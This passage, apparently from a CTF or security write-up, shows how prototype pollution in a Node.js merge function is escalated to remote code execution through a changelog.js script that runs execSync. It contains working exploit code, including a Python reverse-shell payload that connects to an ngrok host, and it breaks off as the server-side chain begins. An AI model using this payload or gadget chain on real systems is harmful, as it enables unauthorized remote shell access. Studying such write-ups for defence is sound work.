If we could find a valid .js file that uses an attribute that we are able to pollute to spawn a new process or execute a command, then we could escalate this to an RCE.
In the Docker container, the most likely place where we could find a suitable candidate would be in the node_modules folder, containing the source code of the installed modules.
Doing a simple search for the child_process string, we could find some interesting scripts:
The changelog.js script indeed has an execSync call with a possible command injection.
'use strict'
/*
Usage:
node scripts/changelog.js [comittish]
Generates changelog entries in our format as best as its able based on
commits starting at comittish, or if that's not passed, latest.
Ordinarily this is run via the gen-changelog shell script, which appends
the result to the changelog.
*/
const execSync = require('child_process').execSync
const branch = process.argv[2] || 'origin/latest'
const log = execSync(`git log --reverse --pretty='format:%h %H%d %s (%aN)%n%b%n---%n' ${branch}...`).toString().split(/\n/)
Since the require() call would not pass in any arguments, process.argv[2] is undefined. Therefore, we can pollute process.argv[2] with a command injection payload before importing the changelog.js file.
Testing this locally:
let a = {}
const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (dest, src) => {
for (var attr in src) {
console.log(attr);
if (isObject(dest[attr]) && isObject(src[attr])) {
merge(dest[attr], src[attr]);
} else {
dest[attr] = src[attr];
}
}
return dest
};
b = {
['__proto__']: {
'2': "; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"6.tcp.ngrok.io\",13984));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';"
}
}
merge(a, b);
require('./changelog.js');
To perform this exploit chain on web server, we first perform the prototype pollution: